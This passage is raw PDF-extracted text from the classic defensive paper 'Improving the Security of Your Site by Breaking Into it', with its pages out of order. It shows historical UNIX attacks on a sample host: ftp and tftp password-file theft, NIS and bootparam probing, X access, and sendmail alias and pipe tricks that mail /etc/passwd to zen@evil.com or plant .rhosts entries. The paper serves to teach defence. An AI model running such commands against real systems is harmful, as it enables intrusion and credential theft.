(or directories. At the very least, make sure that ~ftp and all "system" \
directories and files below ~ftp are )Tj
T*
(owned by root and are not writable by any user. )Tj
0 -2.55714 TD
(While looking at ftp, you can check for an older bug that was once widel\
y exploited: )Tj
/T1_1 1 Tf
0 -2.56197 TD
( % ftp -n)Tj
0 -1.2 TD
( ftp> open victim.com)Tj
T*
( Connected to victim.com)Tj
T*
( 220 victim.com FTP server ready.)Tj
T*
( ftp> quote user ftp)Tj
T*
( 331 Guest login ok, send ident as password.)Tj
T*
( ftp> quote cwd ~root)Tj
T*
( 530 Please login with USER and PASS.)Tj
T*
( ftp> quote pass ftp)Tj
T*
( 230 Guest login ok, access restrictions apply.)Tj
T*
( ftp> ls -al / \(or whatever\))Tj
/T1_0 1 Tf
0 -2.55232 TD
(If this works, you now are logged in as root, and able to modify the pas\
sword file, or whatever you )Tj
0 -1.2 TD
(desire. If your system exhibits this bug, you should definitely get an u\
pdate to your ftpd daemon, either )Tj
T*
(from your vendor or \(via anon ftp\) from ftp.uu.net. )Tj
0 -2.55714 TD
(The wuarchive ftpd, a popular replacement ftp daemon put out by the Wash\
ington University in Saint )Tj
0 -1.2 TD
(Louis, had almost the same problem. If your wuarchive ftpd pre-dates Apr\
il 8, 1993, you should replace )Tj
T*
(it by a more recent version. )Tj
ET
EMC
/Artifact <>BDC
Q
BT
/T1_0 1 Tf
9 0 0 9 18 7.17 Tm
(http://www.deter.com/unix/papers/improve_by_breakin.html \(8 of 22\)2004\
-07-03 )Tj
/C0_0 1 Tf
Tj
/T1_0 1 Tf
( 11:21:39)Tj
ET
EMC
endstream
endobj
139 0 obj 3738
endobj
140 0 obj<>stream
/Artifact <>BDC
0 0 0 rg
0 i
BT
/T1_0 1 Tf
0 Tc 0 Tw 0 Ts 100 Tz 0 Tr 9 0 0 9 18 780.17 Tm
(Improving the Security of Your Site by Breaking Into it)Tj
ET
EMC
/Article <>BDC
q
0 18 612 756 re
W* n
BT
/T1_0 1 Tf
14 0 0 14 10 753.97552 Tm
(Finally, there is a program vaguely similar to ftp -- tftp, or the trivi\
al file transfer program. This daemon )Tj
0 -1.2 TD
(doesn't require any password for authentication; if a host provides tftp\
without restricting the access )Tj
T*
(\(usually via some secure flag set in the inetd.conf file\), an attacker\
can read and write files anywhere on )Tj
T*
(the system. In the example, you get the remote password file and place i\
t in your local /tmp directory: )Tj
/T1_1 1 Tf
0 -2.56197 TD
( evil % tftp)Tj
0 -1.2 TD
( tftp> connect victim.com)Tj
T*
( tftp> get /etc/passwd /tmp/passwd.victim)Tj
T*
( tftp> quit)Tj
/T1_0 1 Tf
0 -2.55232 TD
(For security's sake, tftp should not be run; if tftp is necessary, use t\
he secure option/flag to restrict access )Tj
0 -1.2 TD
(to a directory that has no valuable information, or run it under the con\
trol of a chroot wrapper program. )Tj
ET
0.5 0.5 0.5 rg
10 532 m
10 534 l
602 534 l
601 533 l
11 533 l
11 533 l
h
f
0.875 0.875 0.875 rg
602 534 m
602 532 l
10 532 l
11 533 l
601 533 l
601 533 l
h
f
0 0 0 rg
BT
/T1_0 1 Tf
14 0 0 14 10 512.97552 Tm
(If none of the previous methods have worked, it is time to go on to more\
drastic measures. You have a )Tj
T*
(friend in rpcinfo, another very handy program, sometimes even more usefu\
l than finger. Many hosts run )Tj
T*
(RPC services that can be exploited; rpcinfo can talk to the portmapper a\
nd show you the way. It can tell )Tj
T*
(you if the host is running NIS, if it is a NIS server or slave, if a dis\
kless workstation is around, if it is )Tj
T*
(running NFS, any of the info services \(rusersd, rstatd, etc.\), or any \
other unusual programs \(auditing or )Tj
T*
(security related\). For instance, going back to our sample target: )Tj
/T1_1 1 Tf
0 -2.56197 TD
( evil % rpcinfo -p victim.com [output trimmed for brevity's sake])Tj
0 -1.2 TD
( program vers proto port)Tj
T*
( 100004 2 tcp 673 ypserv)Tj
T*
( 100005 1 udp 721 mountd)Tj
T*
( 100003 2 udp 2049 nfs)Tj
T*
( 100026 1 udp 733 bootparam)Tj
T*
( 100017 1 tcp 1274 rexd)Tj
/T1_0 1 Tf
0 -2.55232 TD
(In this case, you can see several significant facts about our target; fi\
rst of which is that it is an NIS )Tj
0 -1.2 TD
(server. It is perhaps not widely known, but once you know the NIS domain\
name of a server, you can get )Tj
T*
(any of its NIS maps by a simple rpc query, even when you are outside the\
subnet served by the NIS )Tj
T*
(server \(for example, using the YPX program that can be found in the com\
p.sources.misc archives on ftp.)Tj
T*
(uu.net\). In addition, very much like easily guessed passwords, many sys\
tems use easily guessed NIS )Tj
T*
(domainnames. Trying to guess the NIS domainname is often very fruitful. \
Good candidates are the fully )Tj
T*
(and partially qualified hostname \(e.g. "victim" and "victim.com"\), the\
organization name, netgroup )Tj
T*
(names in "showmount" output, and so on. If you wanted to guess that the \
domainname was "victim", )Tj
T*
(you could type: )Tj
/T1_1 1 Tf
0 -2.56195 TD
( evil % ypwhich -d victim victim.com)Tj
0 -1.2 TD
( Domain victim not bound.)Tj
ET
EMC
/Artifact <>BDC
Q
BT
/T1_0 1 Tf
9 0 0 9 18 7.17 Tm
(http://www.deter.com/unix/papers/improve_by_breakin.html \(9 of 22\)2004\
-07-03 )Tj
/C0_0 1 Tf
Tj
/T1_0 1 Tf
( 11:21:39)Tj
ET
EMC
endstream
endobj
141 0 obj 3840
endobj
142 0 obj<>stream
/Artifact <>BDC
0 0 0 rg
0 i
BT
/T1_0 1 Tf
0 Tc 0 Tw 0 Ts 100 Tz 0 Tr 9 0 0 9 18 780.17 Tm
(Improving the Security of Your Site by Breaking Into it)Tj
ET
EMC
/Article <>BDC
q
0 18 612 756 re
W* n
BT
/T1_0 1 Tf
14 0 0 14 10 753.97552 Tm
(This was an unsuccessful attempt; if you had guessed correctly it would \
have returned with the host )Tj
0 -1.2 TD
(name of victim.com's NIS server. However, note from the NFS section that\
victim.com is exporting the )Tj
T*
("/var" directory to the world. All that is needed is to mount this direc\
tory and look in the "yp" )Tj
T*
(subdirectory -- among other things you will see another subdirectory tha\
t contains the domainname of )Tj
T*
(the target. )Tj
/T1_1 1 Tf
0 -2.56197 TD
( evil # mount victim.com:/var /foo)Tj
0 -1.2 TD
( evil # cd /foo)Tj
T*
( evil # /bin/ls -alg /foo/yp)Tj
T*
( total 17)Tj
T*
( 1 drwxr-sr-x 4 root staff 512 Jul 12 14:22 .)Tj
T*
( 1 drwxr-sr-x 11 root staff 512 Jun 29 10:54 ..)Tj
T*
( 11 -rwxr-xr-x 1 root staff 10993 Apr 22 11:56 Makefile)Tj
T*
( 1 drwxr-sr-x 2 root staff 512 Apr 22 11:20 binding)Tj
T*
( 2 drwxr-sr-x 2 root staff 1536 Jul 12 14:22 foo_bar)Tj
T*
( [...])Tj
/T1_0 1 Tf
0 -2.55232 TD
(In this case, "foo_bar" is the NIS domain name. )Tj
0 -2.55714 TD
(In addition, the NIS maps often contain a good list of user/employee nam\
es as well as internal host lists, )Tj
0 -1.2 TD
(not to mention passwords for cracking. )Tj
0 -2.55714 TD
(Appendix C details the results of a case study on NIS password files. )Tj
ET
0.5 0.5 0.5 rg
10 342.80002 m
10 344.80002 l
602 344.80002 l
601 343.80002 l
11 343.80002 l
11 343.80002 l
h
f
0.875 0.875 0.875 rg
602 344.80002 m
602 342.80002 l
10 342.80002 l
11 343.80002 l
601 343.80002 l
601 343.80002 l
h
f
0 0 0 rg
BT
/T1_0 1 Tf
14 0 0 14 10 323.77554 Tm
(You note that the rpcinfo output also showed that victim.com runs rexd. \
Like the rsh daemon, rexd )Tj
0 -1.2 TD
(processes requests of the form "please execute this command as that user\
". Unlike rshd, however, rexd )Tj
T*
(does not care if the client host is in the hosts.equiv or .rhost files. \
Normally the rexd client program is )Tj
T*
(the "on" command, but it only takes a short C program to send arbitrary \
client host and userid )Tj
T*
(information to the rexd server; rexd will happily execute the command. F\
or these reasons, running rexd )Tj
T*
(is similar to having no passwords at all: all security is in the client,\
not in the server where it should be. )Tj
T*
(Rexd security can be improved somewhat by using secure RPC. )Tj
ET
0.5 0.5 0.5 rg
10 190.2 m
10 192.2 l
602 192.2 l
601 191.2 l
11 191.2 l
11 191.2 l
h
f
0.875 0.875 0.875 rg
602 192.2 m
602 190.2 l
10 190.2 l
11 191.2 l
601 191.2 l
601 191.2 l
h
f
0 0 0 rg
BT
/T1_0 1 Tf
14 0 0 14 10 171.17555 Tm
(While looking at the output from rpcinfo, you observe that victim.com al\
so seems to be a server for )Tj
T*
(diskless workstations. This is evidenced by the presence of the bootpara\
m service, which provides )Tj
T*
(information to the diskless clients for booting. If you ask nicely, usin\
g )Tj
T*
(BOOTPARAMPROC_WHOAMI and provide the address of a client, you can get it\
s NIS domainname. )Tj
T*
(This can be very useful when combined with the fact that you can get arb\
itrary NIS maps \(such as the )Tj
T*
(password file\) when you know the NIS domainname. Here is a sample code \
snippet to do just that )Tj
T*
(\(bootparam is part of SATAN.\) )Tj
ET
EMC
/Artifact <>BDC
Q
BT
/T1_0 1 Tf
9 0 0 9 18 7.17 Tm
(http://www.deter.com/unix/papers/improve_by_breakin.html \(10 of 22\)200\
4-07-03 )Tj
/C0_0 1 Tf
Tj
/T1_0 1 Tf
( 11:21:39)Tj
ET
EMC
endstream
endobj
143 0 obj 3507
endobj
144 0 obj<>stream
/Artifact <>BDC
0 0 0 rg
0 i
BT
/T1_0 1 Tf
0 Tc 0 Tw 0 Ts 100 Tz 0 Tr 9 0 0 9 18 780.17 Tm
(Improving the Security of Your Site by Breaking Into it)Tj
ET
EMC
/Article <>BDC
q
0 18 612 756 re
W* n
BT
/T1_1 1 Tf
14 0 0 14 10 753.90814 Tm
( char *server;)Tj
0 -1.2 TD
( struct bp_whoami_arg arg; /* query */)Tj
T*
( struct bp_whoami_res res; /* reply */)Tj
T*
( )Tj
T*
( /* initializations omitted... */)Tj
T*
( )Tj
T*
( callrpc\(server, BOOTPARAMPROG, BOOTPARAMVERS, )Tj
T*
(BOOTPARAMPROC_WHOAMI,)Tj
T*
( xdr_bp_whoami_arg, &arg, xdr_bp_whoami_res, &res\);)Tj
0 -2.39999 TD
( printf\("%s has nisdomain %s\\n", server, res.domain_name\);)Tj
/T1_0 1 Tf
0 -2.55232 TD
(The showmount output indicated that "easy" is a diskless client of victi\
m.com, so we use its client )Tj
0 -1.2 TD
(address in the BOOTPARAMPROC_WHOAMI query: )Tj
/T1_1 1 Tf
0 -2.56197 TD
( evil % bootparam victim.com easy.victim.com)Tj
0 -1.2 TD
( victim.com has nisdomain foo_bar)Tj
ET
0.5 0.5 0.5 rg
10 448 m
10 450 l
602 450 l
601 449 l
11 449 l
11 449 l
h
f
0.875 0.875 0.875 rg
602 450 m
602 448 l
10 448 l
11 449 l
601 449 l
601 449 l
h
f
0 0 0 rg
BT
/T1_0 1 Tf
14 0 0 14 10 428.97556 Tm
(NIS masters control the mail aliases for the NIS domain in question. Jus\
t like local mail alias files, you )Tj
T*
(can create a mail alias that will execute commands when mail is sent to \
it \(a once popular example of )Tj
T*
(this is the "decode" alias which uudecodes mail files sent to it.\) For \
instance, here you create an alias )Tj
T*
("foo", which mails the password file back to evil.com by simply mailing \
any message to it: )Tj
/T1_1 1 Tf
0 -2.56197 TD
( nis-master # echo 'foo: "| mail zen@evil.com < /etc/passwd "' >> /)Tj
0 -1.2 TD
(etc/aliases)Tj
T*
( nis-master # cd /var/yp)Tj
T*
( nis-master # make aliases)Tj
T*
( nis-master # echo test | mail -v foo@victim.com)Tj
/T1_0 1 Tf
0 -2.55232 TD
(Hopefully attackers won't have control of your NIS master host, but even\
more hopefully the lesson is )Tj
0 -1.2 TD
(clear -- NIS is normally insecure, but if an attacker has control of you\
r NIS master, then s/he effectively )Tj
T*
(has control of the client hosts \(e.g. can execute arbitrary commands\).\
)Tj
0 -2.55714 TD
(There aren't many effective defenses against NIS attacks; it is an insec\
ure service that has almost no )Tj
0 -1.2 TD
(authentication between clients and servers. To make things worse, it see\
ms fairly clear that arbitrary )Tj
T*
(maps can be forced onto even master servers \(e.g., it is possible to tr\
eat an NIS server as a client\). This, )Tj
T*
(obviously, would subvert the entire schema. If it is absolutely necessar\
y to use NIS, choosing a hard to )Tj
T*
(guess domainname can help slightly, but if you run diskless clients that\
are exposed to potential )Tj
T*
(attackers then it is trivial for an attacker to defeat this simple step \
by using the bootparam trick to get the )Tj
T*
(domainname. If NIS is used to propagate the password maps, then shadow p\
asswords do not give )Tj
T*
(additional protection because the shadow map is still accessible to any \
attacker that has root on an )Tj
ET
EMC
/Artifact <>BDC
Q
BT
/T1_0 1 Tf
9 0 0 9 18 7.17 Tm
(http://www.deter.com/unix/papers/improve_by_breakin.html \(11 of 22\)200\
4-07-03 )Tj
/C0_0 1 Tf
Tj
/T1_0 1 Tf
( 11:21:39)Tj
ET
EMC
endstream
endobj
145 0 obj 3456
endobj
146 0 obj<>stream
/Artifact <>BDC
0 0 0 rg
0 i
BT
/T1_0 1 Tf
0 Tc 0 Tw 0 Ts 100 Tz 0 Tr 9 0 0 9 18 780.17 Tm
(Improving the Security of Your Site by Breaking Into it)Tj
ET
EMC
/Article <>BDC
q
0 18 612 756 re
W* n
BT
/T1_0 1 Tf
14 0 0 14 10 753.97552 Tm
(attacking host. Better is to use NIS as little as possible, or to at lea\
st realize that the maps can be subject )Tj
0 -1.2 TD
(to perusal by potentially hostile forces. )Tj
0 -2.55714 TD
(Secure RPC goes a long way to diminish the threat, but it has its own pr\
oblems, primarily in that it is )Tj
0 -1.2 TD
(difficult to administer, but also in that the cryptographic methods used\
within are not very strong. It has )Tj
T*
(been rumored that NIS+, Sun's new network information service, fixes som\
e of these problems, but until )Tj
T*
(now it has been limited to running on Suns, and thus far has not lived u\
p to the promise of the design. )Tj
T*
(Finally, using packet filtering \(at the very least port 111\) or secure\
lib \(see appendix D\), or, for Suns, )Tj
T*
(applying Sun patch 100482-02 all can help. )Tj
ET
0.5 0.5 0.5 rg
10 584.59998 m
10 586.59998 l
602 586.59998 l
601 585.59998 l
11 585.59998 l
11 585.59998 l
h
f
0.875 0.875 0.875 rg
602 586.59998 m
602 584.59998 l
10 584.59998 l
11 585.59998 l
601 585.59998 l
601 585.59998 l
h
f
0 0 0 rg
BT
/T1_0 1 Tf
14 0 0 14 10 565.57556 Tm
(The portmapper only knows about RPC services. Other network services can\
be located with a brute-)Tj
T*
(force method that connects to all network ports. Many network utilities \
and windowing systems listen to )Tj
T*
(specific ports \(e.g. sendmail is on port 25, telnet is on port 23, X wi\
ndows is usually on port 6000, etc.\) )Tj
T*
(SATAN includes a program that scans the ports of a remote hosts and repo\
rts on its findings; if you run )Tj
T*
(it against our target, you see: )Tj
/T1_1 1 Tf
0 -2.56197 TD
( evil % tcpmap victim.com)Tj
0 -1.2 TD
( Mapping 128.128.128.1)Tj
T*
( port 21: ftp)Tj
T*
( port 23: telnet)Tj
T*
( port 25: smtp)Tj
T*
( port 37: time)Tj
T*
( port 79: finger)Tj
T*
( port 512: exec)Tj
T*
( port 513: login)Tj
T*
( port 514: shell)Tj
T*
( port 515: printer)Tj
T*
( port 6000: \(X\))Tj
/T1_0 1 Tf
0 -2.55232 TD
(This suggests that victim.com is running X windows. If not protected pro\
perly \(via the magic cookie or )Tj
0 -1.2 TD
(xhost mechanisms\), window displays can be captured or watched, user key\
strokes may be stolen, )Tj
T*
(programs executed remotely, etc. Also, if the target is running X and ac\
cepts a telnet to port 6000, that )Tj
T*
(can be used for a denial of service attack, as the target's windowing sy\
stem will often "freeze up" for a )Tj
T*
(short period of time. One method to determine the vulnerability of an X \
server is to connect to it via the )Tj
T*
(XOpenDisplay\(\) function; if the function returns NULL then you cannot \
access the victim's display )Tj
T*
(\(opendisplay is part of SATAN\): )Tj
/T1_1 1 Tf
0 -2.56195 TD
( char *hostname;)Tj
0 -2.39999 TD
( if \(XOpenDisplay\(hostname\) == NULL\) {)Tj
0 -1.2 TD
( printf\("Cannot open display: %s\\n", hostname\);)Tj
T*
( } else {)Tj
ET
EMC
/Artifact <>BDC
Q
BT
/T1_0 1 Tf
9 0 0 9 18 7.17 Tm
(http://www.deter.com/unix/papers/improve_by_breakin.html \(12 of 22\)200\
4-07-03 )Tj
/C0_0 1 Tf
Tj
/T1_0 1 Tf
( 11:21:39)Tj
ET
EMC
endstream
endobj
147 0 obj 2225
endobj
148 0 obj<>stream
/Artifact <>BDC
0 0 0 rg
0 i
BT
/T1_0 1 Tf
0 Tc 0 Tw 0 Ts 100 Tz 0 Tr 9 0 0 9 18 780.17 Tm
(Improving the Security of Your Site by Breaking Into it)Tj
ET
EMC
/Article <>BDC
q
0 18 612 756 re
W* n
0.5 0.5 0.5 rg
10 753.55385 m
10 755.55385 l
602 755.55385 l
601 754.55385 l
11 754.55385 l
11 754.55385 l
h
f
0.875 0.875 0.875 rg
602 755.55385 m
602 753.55385 l
10 753.55385 l
11 754.55385 l
601 754.55385 l
601 754.55385 l
h
f
0 0 0 rg
BT
/T1_1 1 Tf
19.38461 0 0 19.38461 10 710.56873 Tm
(Suggested reading:)Tj
/T1_2 1 Tf
14 0 0 14 10 673.26787 Tm
(Bellovin, Steve)Tj
/T1_0 1 Tf
(, )Tj
/T1_3 1 Tf
(Security Problems in the TCP/IP Protocol Suite)Tj
/T1_0 1 Tf
(, Computer Communication Review 19 )Tj
0 -1.2 TD
(\(2\), 1989; a comment by Stephen Kent appears in volume 19 \(3\), 1989.\
)Tj
/T1_2 1 Tf
0 -2.55714 TD
(Garfinkle, Simson and Spafford, Gene)Tj
/T1_0 1 Tf
(, )Tj
/T1_3 1 Tf
(Practical UNIX Security)Tj
/T1_0 1 Tf
(, O'Reilly and Associates, Inc., 1992. )Tj
/T1_2 1 Tf
0 -2.55714 TD
(Hess, David, Safford, David, and Pooch, Udo)Tj
/T1_0 1 Tf
(, )Tj
/T1_3 1 Tf
(A UNIX Network Protocol Study: Network Information )Tj
0 -1.2 TD
(Service)Tj
/T1_0 1 Tf
(, Computer Communication Review 22 \(5\) 1992. )Tj
/T1_3 1 Tf
0 -2.55714 TD
(Phreak Accident, Playing Hide and Seek, UNIX style)Tj
/T1_0 1 Tf
(, Phrack, Volume Four, Issue Forty-Three, File 14 )Tj
0 -1.2 TD
(of 27. )Tj
/T1_2 1 Tf
0 -2.55714 TD
(Ranum, Marcus)Tj
/T1_0 1 Tf
(, )Tj
/T1_3 1 Tf
(Firewalls)Tj
/T1_0 1 Tf
( internet electronic mailing list, Sept 1993. )Tj
/T1_2 1 Tf
T*
(Schuba, Christoph)Tj
/T1_0 1 Tf
(, )Tj
/T1_3 1 Tf
(Addressing Weaknesses in the Domain Name System Protocal)Tj
/T1_0 1 Tf
(, Purdue University, )Tj
0 -1.20001 TD
(August 1993. )Tj
/T1_2 1 Tf
0 -2.55714 TD
(Thompson, Ken)Tj
/T1_0 1 Tf
(, )Tj
/T1_3 1 Tf
(Reflections on Trusting Trust)Tj
/T1_0 1 Tf
(, Communications of the ACM 27 \(8\),1984. )Tj
ET
EMC
/Artifact <>BDC
Q
BT
/T1_0 1 Tf
9 0 0 9 18 7.17 Tm
(http://www.deter.com/unix/papers/improve_by_breakin.html \(22 of 22\)200\
4-07-03 )Tj
/C0_0 1 Tf
Tj
/T1_0 1 Tf
( 11:21:39)Tj
ET
EMC
endstream
endobj
149 0 obj 3385
endobj
150 0 obj<>stream
/Artifact <>BDC
0 0 0 rg
0 i
BT
/T1_0 1 Tf
0 Tc 0 Tw 0 Ts 100 Tz 0 Tr 9 0 0 9 18 780.17 Tm
(Improving the Security of Your Site by Breaking Into it)Tj
ET
EMC
/Article <>BDC
q
0 18 612 756 re
W* n
BT
/T1_1 1 Tf
14 0 0 14 10 751.30817 Tm
( printf\("Can open display: %s\\n", hostname\);)Tj
0 -1.2 TD
( })Tj
0 -2.39999 TD
( evil % opendisplay victim.com:0)Tj
0 -1.2 TD
( Cannot open display: victim.com:0)Tj
/T1_0 1 Tf
0 -2.55232 TD
(X terminals, though much less powerful than a complete UNIX system, can \
have their own security )Tj
0 -1.2 TD
(problems. Many X terminals permit unrestricted rsh access, allowing you \
to start X client programs in )Tj
T*
(the victim's terminal with the output appearing on your own screen: )Tj
/T1_1 1 Tf
0 -2.56197 TD
( evil % xhost +xvictim.victim.com)Tj
0 -1.2 TD
( evil % rsh xvictim.victim.com telnet victim.com -display evil.com)Tj
/T1_0 1 Tf
0 -2.55232 TD
(In any case, give as much thought to your window security as your filesy\
stem and network utilities, for )Tj
0 -1.2 TD
(it can compromise your system as surely as a "+" in your hosts.equiv or \
a passwordless \(root\) account. )Tj
ET
0.5 0.5 0.5 rg
10 476.80002 m
10 478.80002 l
602 478.80002 l
601 477.80002 l
11 477.80002 l
11 477.80002 l
h
f
0.875 0.875 0.875 rg
602 478.80002 m
602 476.80002 l
10 476.80002 l
11 477.80002 l
601 477.80002 l
601 477.80002 l
h
f
0 0 0 rg
BT
/T1_0 1 Tf
14 0 0 14 10 457.77554 Tm
(Next, you examine sendmail. Sendmail is a very complex program that has \
a long history of security )Tj
T*
(problems, including the infamous "wiz" command \(hopefully long since di\
sabled on all machines\). You )Tj
T*
(can often determine the OS, sometimes down to the version number, of the\
target, by looking at the )Tj
T*
(version number returned by sendmail. This, in turn, can give you hints a\
s to how vulnerable it might be )Tj
T*
(to any of the numerous bugs. In addition, you can see if they run the "d\
ecode" alias, which has its own )Tj
T*
(set of problems: )Tj
/T1_1 1 Tf
0 -2.56197 TD
( evil % telnet victim.com 25)Tj
0 -1.2 TD
( connecting to host victim.com \(128.128.128.1.\), port 25)Tj
T*
( connection open)Tj
T*
( 220 victim.com Sendmail Sendmail 5.55/victim ready at Fri, 6 Nov 93 )Tj
T*
(18:00 PDT)Tj
T*
( expn decode)Tj
T*
( 250 <"|/usr/bin/uudecode">)Tj
T*
( quit)Tj
/T1_0 1 Tf
0 -2.55232 TD
(Running the "decode" alias is a security risk -- it allows potential att\
ackers to overwrite any file that is )Tj
0 -1.2 TD
(writable by the owner of that alias -- often daemon, but potentially any\
user. Consider this piece of mail )Tj
T*
(-- this will place "evil.com" in user zen's .rhosts file if it is writab\
le: )Tj
/T1_1 1 Tf
0 -2.56195 TD
( evil % echo "evil.com" | uuencode /home/zen/.rhosts | mail )Tj
0 -1.2 TD
(decode@victim.com)Tj
/T1_0 1 Tf
0 -2.55232 TD
(If no home directories are known or writable, an interesting variation o\
f this is to create a bogus /etc/)Tj
0 -1.2 TD
(aliases.pag file that contains an alias with a command you wish to execu\
te on your target. This may )Tj
ET
EMC
/Artifact <>BDC
Q
BT
/T1_0 1 Tf
9 0 0 9 18 7.17 Tm
(http://www.deter.com/unix/papers/improve_by_breakin.html \(13 of 22\)200\
4-07-03 )Tj
/C0_0 1 Tf
Tj
/T1_0 1 Tf
( 11:21:39)Tj
ET
EMC
endstream
endobj
151 0 obj 3221
endobj
152 0 obj<>stream
/Artifact <>BDC
0 0 0 rg
0 i
BT
/T1_0 1 Tf
0 Tc 0 Tw 0 Ts 100 Tz 0 Tr 9 0 0 9 18 780.17 Tm
(Improving the Security of Your Site by Breaking Into it)Tj
ET
EMC
/Article <>BDC
q
0 18 612 756 re
W* n
BT
/T1_0 1 Tf
14 0 0 14 10 753.97552 Tm
(work since on many systems the aliases.pag and aliases.dir files, which \
control the system's mail aliases, )Tj
0 -1.2 TD
(are writable to the world. )Tj
/T1_1 1 Tf
0 -2.56197 TD
( evil % cat decode)Tj
0 -1.2 TD
( bin: "| cat /etc/passwd | mail zen@evil.com")Tj
T*
( evil % newaliases -oQ/tmp -oA`pwd`/decode)Tj
T*
( evil % uuencode decode.pag /etc/aliases.pag | mail decode@victom.com)Tj
T*
( evil % /usr/lib/sendmail -fbin -om -oi bin@victim.com < /dev/null)Tj
/T1_0 1 Tf
0 -2.55232 TD
(A lot of things can be found out by just asking sendmail if an address i\
s acceptable \(vrfy\), or what an )Tj
0 -1.2 TD
(address expands to \(expn\). When the finger or rusers services are turn\
ed off, vrfy and expn can still be )Tj
T*
(used to identify user accounts or targets. Vrfy and expn can also be use\
d to find out if the user is piping )Tj
T*
(mail through any program that might be exploited \(e.g. vacation, mail s\
orters, etc.\). It can be a good idea )Tj
T*
(to disable the vrfy and expn commands: in most versions, look at the sou\
rce file srvrsmtp.c, and either )Tj
T*
(delete or change the two lines in the CmdTab structure that have the str\
ings "vrfy" and "expn". Sites )Tj
T*
(without source can still disable expn and vrfy by just editing the sendm\
ail executable with a binary )Tj
T*
(editor and replacing "vrfy" and "expn" with blanks. Acquiring a recent v\
ersion of sendmail \(see )Tj
T*
(Appendix D\) is also an extremely good idea, since there have probably b\
een more security bugs reported )Tj
T*
(in sendmail than in any other UNIX program. )Tj
ET
0.5 0.5 0.5 rg
10 414.39999 m
10 416.39999 l
602 416.39999 l
601 415.39999 l
11 415.39999 l
11 415.39999 l
h
f
0.875 0.875 0.875 rg
602 416.39999 m
602 414.39999 l
10 414.39999 l
11 415.39999 l
601 415.39999 l
601 415.39999 l
h
f
0 0 0 rg
BT
/T1_0 1 Tf
14 0 0 14 10 395.37555 Tm
(As a sendmail-sendoff, there are two fairly well known bugs that should \
be checked into. The first was )Tj
T*
(definitely fixed in version 5.59 from Berkeley; despite the messages bel\
ow, for versions of sendmail )Tj
T*
(previous to 5.59, the "evil.com" gets appended, despite the error messag\
es, along with all of the typical )Tj
T*
(mail headers, to the file specified: )Tj
/T1_1 1 Tf
0 -2.56197 TD
( % cat evil_sendmail)Tj
0 -1.2 TD
( telnet victim.com 25 << EOSM)Tj
T*
( rcpt to: /home/zen/.rhosts)Tj
T*
( mail from: zen)Tj
T*
( data)Tj
T*
( random garbage)Tj
T*
( .)Tj
T*
( rcpt to: /home/zen/.rhosts)Tj
T*
( mail from: zen)Tj
T*
( data)Tj
T*
( evil.com)Tj
T*
( .)Tj
T*
( quit)Tj
T*
( EOSM)Tj
0 -2.39999 TD
( evil % /bin/sh evil_sendmail)Tj
0 -1.2 TD
( Trying 128.128.128.1)Tj
ET
EMC
/Artifact <>BDC
Q
BT
/T1_0 1 Tf
9 0 0 9 18 7.17 Tm
(http://www.deter.com/unix/papers/improve_by_breakin.html \(14 of 22\)200\
4-07-03 )Tj
/C0_0 1 Tf
Tj
/T1_0 1 Tf
( 11:21:39)Tj
ET
EMC
endstream
endobj
153 0 obj 2990
endobj
154 0 obj<>stream
/Artifact <>BDC
0 0 0 rg
0 i
BT
/T1_0 1 Tf
0 Tc 0 Tw 0 Ts 100 Tz 0 Tr 9 0 0 9 18 780.17 Tm
(Improving the Security of Your Site by Breaking Into it)Tj
ET
EMC
/Article <>BDC
q
0 18 612 756 re
W* n
BT
/T1_1 1 Tf
14 0 0 14 10 753.50812 Tm
( Connected to victim.com)Tj
0 -1.2 TD
( Escape character is '^]'.)Tj
T*
( Connection closed by foreign host.)Tj
0 -2.39999 TD
( evil % rlogin victim.com -l zen)Tj
0 -1.2 TD
( Welcome to victim.com!)Tj
T*
( victim %)Tj
/T1_0 1 Tf
0 -2.55232 TD
(The second hole, fixed only recently, permitted anyone to specify arbitr\
ary shell commands and/or )Tj
0 -1.2 TD
(pathnames for the sender and/or destination address. Attempts to keep de\
tails secret were in vain, and )Tj
T*
(extensive discussions in mailing lists and usenet news groups led to dis\
closure of how to exploit some )Tj
T*
(versions of the bug. As with many UNIX bugs, nearly every vendor's sendm\
ail was vulnerable to the )Tj
T*
(problem, since they all share a common source code tree ancestry. Space \
precludes us from discussing it )Tj
T*
(fully, but a typical attack to get the password file might look like thi\
s: )Tj
/T1_1 1 Tf
0 -2.56197 TD
( evil % telnet victim.com 25)Tj
0 -1.2 TD
( Trying 128.128.128.1...)Tj
T*
( Connected to victim.com)Tj
T*
( Escape character is '^]'.)Tj
T*
( 220 victim.com Sendmail 5.55 ready at Saturday, 6 Nov 93 18:04)Tj
T*
( mail from: "|/bin/mail zen@evil.com < /etc/passwd")Tj
T*
( 250 "|/bin/mail zen@evil.com < /etc/passwd"... Sender ok)Tj
T*
( rcpt to: nosuchuser)Tj
T*
( 550 nosuchuser... User unknown)Tj
T*
( data)Tj
T*
( 354 Enter mail, end with "." on a line by itself)Tj
T*
( .)Tj
T*
( 250 Mail accepted)Tj
T*
( quit)Tj
T*
( Connection closed by foreign host.)Tj
T*
( evil %)Tj
/T1_0 1 Tf
0 -2.55232 TD
(At the time of writing, version 8.6.4 of sendmail \(see Appendix D for i\
nformation on how to get this\) is )Tj
0 -1.2 TD
(reportedly the only variant of sendmail with all of the recent security \
bugs fixed. )Tj
/T1_2 1 Tf
19.38461 0 0 19.38461 10 151.81488 Tm
(Trust)Tj
/T1_0 1 Tf
14 0 0 14 10 114.51402 Tm
(For our final topic of vulnerability, we'll digress from the practical s\
trategy we've followed previously to )Tj
T*
(go a bit more into the theoretical side, and briefly discuss the notion \
of trust. The issues and implications )Tj
T*
(of vulnerabilities here are a bit more subtle and far-reaching than what\
we've covered before; in the )Tj
T*
(context of this paper we use the word trust whenever there is a situatio\
n when a server \(note that any )Tj
T*
(host that allows remote access can be called a server\) can permit a loc\
al resource to be used by a client )Tj
ET
EMC
/Artifact <>BDC
Q
BT
/T1_0 1 Tf
9 0 0 9 18 7.17 Tm
(http://www.deter.com/unix/papers/improve_by_breakin.html \(15 of 22\)200\
4-07-03 )Tj
/C0_0 1 Tf
Tj
/T1_0 1 Tf
( 11:21:39)Tj
ET
EMC
endstream
endobj
155 0 obj 3987
endobj
156 0 obj<>stream
/Artifact <>BDC
0 0 0 rg
0 i
BT
/T1_0 1 Tf
0 Tc 0 Tw 0 Ts 100 Tz 0 Tr 9 0 0 9 18 780.17 Tm
(Improving the Security of Your Site by Breaking Into it)Tj
ET
EMC
/Article <>BDC
q
0 18 612 756 re
W* n
BT
/T1_0 1 Tf
14 0 0 14 10 753.97552 Tm
(without password authentication when password authentication is normally\
required. In other words, we )Tj
0 -1.2 TD
